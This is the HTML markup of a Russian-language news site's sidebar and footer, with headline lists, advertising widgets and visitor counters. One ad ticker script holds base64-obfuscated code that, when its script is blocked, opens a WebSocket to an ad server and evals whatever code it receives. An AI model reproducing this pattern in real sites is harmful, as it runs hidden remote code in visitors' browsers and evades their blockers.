        <!-- noindex -->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--/ noindex -->  
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<div id="FMg6hQON63UZxhcgPUb0" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/fR37/h0.js" ></script>
<!-- -------------Informer block------------- -->
<div id="svtn_inf_18" class="svtn_inf" data-tisid="18"></div>
<!-- ---------------------------------------- -->
<!-- -------------Before </body>------------- -->
<script async="async">
function nmbrsvtn(nma){
  var nmc=false;
  function nmr(){
      if(nmc)return;
      nmc=true;
      nma();
  }
  if(document.addEventListener){
      document.addEventListener("DOMContentLoaded",function(){nmr();},false)}else if   (document.attachEvent){if(document.documentElement.doScroll&&window==window.top){function nmts(){if(nmc)return;if(!document.body)return;try{document.documentElement.doScroll("left");nmr();}catch(e){setTimeout(nmts,100);}}nmts();}document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){nmr();}})}if(window.addEventListener)window.addEventListener("load",nmr,false);else if(window.attachEvent)window.attachEvent("onload",nmr);window.onload=nmr;
}

function start_svtn_tis() {  
var el = document.getElementsByClassName("svtn_inf");
var arr_inf = "";
for (var i = 0; i < el.length; i++) {
if (i == el.length - 1) {
arr_inf = arr_inf + el[i].getAttribute("data-tisid");
}else{
arr_inf = arr_inf + el[i].getAttribute("data-tisid") + "_";
}
}
var el2 = document.getElementsByTagName("body");
var svtnscrpt = document.createElement('script');
svtnscrpt.type = 'text/javascript';
svtnscrpt.src = 'https://svitnews.com/V/get/inf/' + arr_inf;
svtnscrpt.async = 'async';
 el2[0].appendChild(svtnscrpt);
return;
}
function pre_start_svtn_tis(){
if(window.flag_svtn === true){
return;
}
window.flag_svtn = true;

start_svtn_tis();
}
nmbrsvtn(pre_start_svtn_tis);
</script>  
<!-- ---------------------------------------- -->
<script id="r17725" type="text/javascript">
    (function() {
        var worker17725,
            tickerID = 17725,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17725.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17725.postMessage(data);
                }

                worker17725 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17725.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17725.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
<center><script>
(function(c,o,u,n,t,e,r){
r = c[u](o); r[n] = t; r.async = 1;
r.onload = function(){c['AliExpressBannerGlobalObject'](e)};
c.body.appendChild(r);
})(document, 'script', 'createElement', 'src', '//alishop6.ru/902dy/src.js');
</script>

<div class="some_class"></div>
</center>
    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/351326-vrachi-obyasnili-k-chemu-privodyat-tatuirovki-na-tele.html"><span>15.09-00:19</span>
	<strong title="Врачи объяснили, к чему приводят татуировки на теле">Врачи объяснили, к чему приводят татуировки на теле</strong></a><b>2553</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/mir/350112-otrekshiysya-belgiyskiy-korol-popal-v-kureznuyu-situaciyu.html"><span>11.09-00:09</span>
	<strong title="Отрекшийся бельгийский король попал в курьезную ситуацию">Отрекшийся бельгийский король попал в курьезную ситуацию</strong></a><b>1266</b><div class="category_lastn_date" title="Мир">&nbsp;&nbsp;<a href="http://hronika.info/mir/">Мир</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/350113-nazvany-luchshie-nochnye-produkty-pitaniya.html"><span>11.09-00:19</span>
	<strong title="Названы лучшие "ночные" продукты питания">Названы лучшие "ночные" продукты питания</strong></a><b>1524</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/350114-slabovidyaschie-smogut-pochuvstvovat-izvestnyy-zamok-na-oschup-video.html"><span>11.09-00:30</span>
	<strong title="Слабовидящие смогут почувствовать известный замок на ощупь. Видео">Слабовидящие смогут почувствовать известный замок на ощупь. Видео</strong></a><b>1409</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/sport/351047-surkis-isklyuchil-otstavku-hackevicha-s-posta-glavnogo-trenera-dinamo.html"><span>14.09-00:06</span>
	<strong title="Суркис исключил отставку Хацкевича с поста главного тренера «Динамо»">Суркис исключил отставку Хацкевича с поста главного тренера «Динамо»</strong></a><b>806</b><div class="category_lastn_date" title="Спорт">&nbsp;&nbsp;<a href="http://hronika.info/sport/">Спорт</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/351046-tesla-razreshila-klientam-zaryazhat-elektrokary-besplatno.html"><span>14.09-00:09</span>
	<strong title="Tesla разрешила клиентам заряжать электрокары бесплатно">Tesla разрешила клиентам заряжать электрокары бесплатно</strong></a><b>3505</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/351049-v-indii-moschnye-livni-zatopili-celyy-gorod-video.html"><span>14.09-00:30</span>
	<strong title="В Индии мощные ливни затопили целый город. Видео">В Индии мощные ливни затопили целый город. Видео</strong></a><b>1009</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kriminal/351050-v-kieve-pod-kolesami-gruzovika-pogib-peshehod.html"><span>14.09-00:41</span>
	<strong title="В Киеве под колесами грузовика погиб пешеход">В Киеве под колесами грузовика погиб пешеход</strong></a><b>688</b><div class="category_lastn_date" title="Происшествия">&nbsp;&nbsp;<a href="http://hronika.info/kriminal/">Происшествия</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/349818-kamera-na-sputnike-zasnyala-zapusk-rakety-v-kitae-video.html"><span>10.09-00:19</span>
	<strong title="Камера на спутнике засняла запуск ракеты в Китае. Видео">Камера на спутнике засняла запуск ракеты в Китае. Видео</strong></a><b>1391</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/349817-uchenye-zafiksirovali-elektromagnitnye-anomalii-v-yuar.html"><span>10.09-00:09</span>
	<strong title="Ученые зафиксировали электромагнитные аномалии в ЮАР">Ученые зафиксировали электромагнитные аномалии в ЮАР</strong></a><b>1127</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/mir/351477-v-avstrii-na-dne-ozera-nashli-sokrovischa-gitlera.html"><span>15.09-17:58</span>
	<strong title="В Австрии на дне озера нашли сокровища Гитлера">В Австрии на дне озера нашли сокровища Гитлера</strong></a><b>51779</b><div class="category_lastn_date" title="Мир">&nbsp;&nbsp;<a href="http://hronika.info/mir/">Мир</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/351204-zvezda-kvartala-95-pohvastalas-podrosshimi-detmi.html"><span>14.09-15:03</span>
	<strong title="Звезда "Квартала-95" похвасталась подросшими детьми">Звезда "Квартала-95" похвасталась подросшими детьми</strong></a><b>50806</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/349827-aktery-studii-kvartal-95-pokazali-svoih-dvoynikov.html"><span>10.09-02:03</span>
	<strong title="Актеры студии "Квартал 95" показали своих двойников">Актеры студии "Квартал 95" показали своих двойников</strong></a><b>39519</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/350760-eti-prostye-sovety-pomogut-nachat-pohudenie.html"><span>13.09-08:09</span>
	<strong title="Эти простые советы помогут начать похудение">Эти простые советы помогут начать похудение</strong></a><b>21728</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/349859-nazvany-produkty-suschestvenno-zamedlyayuschie-pohudenie.html"><span>10.09-09:21</span>
	<strong title="Названы продукты, существенно замедляющие похудение">Названы продукты, существенно замедляющие похудение</strong></a><b>20231</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/350532-dietologi-podskazali-kak-skinut-7-kg-za-tri-dnya.html"><span>12.09-12:07</span>
	<strong title="Диетологи подсказали, как "скинуть" 7 кг за три дня">Диетологи подсказали, как "скинуть" 7 кг за три дня</strong></a><b>15114</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/351325-na-kosmicheskie-snimki-antarktidy-popali-neobychnye-obekty.html"><span>15.09-00:09</span>
	<strong title="На космические снимки Антарктиды попали необычные объекты">На космические снимки Антарктиды попали необычные объекты</strong></a><b>14183</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/tehnologii/351405-lg-pridumala-telefon-s-vytyagivayuschimsya-ekranom.html"><span>15.09-12:26</span>
	<strong title="LG придумала телефон с вытягивающимся экраном">LG придумала телефон с вытягивающимся экраном</strong></a><b>11144</b><div class="category_lastn_date" title="Технологии">&nbsp;&nbsp;<a href="http://hronika.info/tehnologii/">Технологии</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/349911-v-seti-vysmeyali-zvezd-priglashennyh-na-den-luganska.html"><span>10.09-11:07</span>
	<strong title="В Сети высмеяли «звезд», приглашенных на День Луганска">В Сети высмеяли «звезд», приглашенных на День Луганска</strong></a><b>9768</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/349987-ukrainskaya-veduschaya-povzdorila-s-vladom-yamoy-v-pryamom-efire-video.html"><span>10.09-15:21</span>
	<strong title="Украинская ведущая повздорила с Владом Ямой в прямом эфире. Видео">Украинская ведущая повздорила с Владом Ямой в прямом эфире. Видео</strong></a><b>8349</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
              <h3>Интересные новости</h3>
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              <!--noindex -->
<!-- MarketGidNews Start -->
<div id="MarketGidScriptRootN8362" class="news-block-magick">
    <div id="MarketGidPreloadN8362">
        <a id="mg_add8362" href="http://usr.marketgid.com/demo/celevie-posetiteli/" rel="nofollow" target="_blank"><img src="//cdn.marketgid.com/images/marketgid_add_link.png" style="border:0px"></a><br>        <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN8362")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN8362");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=8362;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/h/r/hronika.info.8362.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- MarketGidNews End -->
<!--/noindex-->
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <div class="join_informer_3674" id="join_informer_3674"></div>

<!-- Асинхронный код, 10.02.2016 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "//partner.join.com.ua/async/3674/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2018</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
                
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t17.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
</script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"><!--noindex-->
<!-- I.UA counter --><a href="http://www.i.ua/" target="_blank" onclick="this.href='http://i.ua/r.php?165947';" title="Rated by I.UA">
<script type="text/javascript"><!--
iS='http'+(window.location.protocol=='https:'?'s':'')+
'://r.i.ua/s?u165947&p164&n'+Math.random();
iD=document;if(!iD.cookie)iD.cookie="b=b; path=/";if(iD.cookie)iS+='&c1';
iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)
+"&w"+screen.width+'&h'+screen.height;
iT=iR=iD.referrer.replace(iP=/^[a-z]*:\/\//,'');iH=window.location.href.replace(iP,'');
((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length);
if(iT!=iH.substring(0,iI))iS+='&f'+escape(iR);
iS+='&r'+escape(iH);
iD.write('<img src="'+iS+'" border="0" width="88" height="31" />');
//--></script></a><!-- End of I.UA counter -->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;


















ФОТОРЕПОРТАЖИ

</b>
              <a class="close7">X</a>
            </div>






















<div class="vsplivayushee-okno">
    <span class="spandate">16.09-19:52</span>
	<strong title="Фотограф показал, почему Токио называют городом контрастной красоты. Фото"><a href="http://hronika.info/fotoreportazhi/351630-fotograf-pokazal-pochemu-tokio-nazyvayut-gorodom-kontrastnoy-krasoty-foto.html">Фотограф показал, почему Токио называют городом</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">16.09-19:12</span>
	<strong title="Фотограф создает сказочные миры в своих снимках. Фото"><a href="http://hronika.info/fotoreportazhi/351629-fotograf-sozdaet-skazochnye-miry-v-svoih-snimkah-foto.html">Фотограф создает сказочные миры в своих снимках.</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">16.09-18:32</span>
	<strong title="Яркие снимки от мастера подводной макросъемки. Фото"><a href="http://hronika.info/fotoreportazhi/351623-yarkie-snimki-ot-mastera-podvodnoy-makrosemki-foto.html">Яркие снимки от мастера подводной макросъемки.</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">16.09-16:55</span>
	<strong title="Лучшие снимки по версии конкурса «Инстаграм-снимок года». Фото"><a href="http://hronika.info/fotoreportazhi/351685-luchshie-snimki-po-versii-konkursa-instagram-snimok-goda-foto.html">Лучшие снимки по версии конкурса</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">16.09-15:06</span>
	<strong title="Киев в уникальных ретро-снимках. Фото"><a href="http://hronika.info/fotoreportazhi/351657-kiev-v-unikalnyh-retro-snimkah-foto.html">Киев в уникальных ретро-снимках. Фото</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">16.09-12:47</span>
	<strong title="Этот загадочный дом был заперт целое столетие. Фото"><a href="http://hronika.info/fotoreportazhi/351620-etot-zagadochnyy-dom-byl-zapert-celoe-stoletie-foto.html">Этот загадочный дом был заперт целое столетие.</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">16.09-11:40</span>
	<strong title="Мифы о самолетах, в которые верят многие. Фото"><a href="http://hronika.info/fotoreportazhi/351607-mify-o-samoletah-v-kotorye-veryat-mnogie-foto.html">Мифы о самолетах, в которые верят многие. Фото</a></strong>			
</div>


            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>

<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/ED9.js" ></script>
 
</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
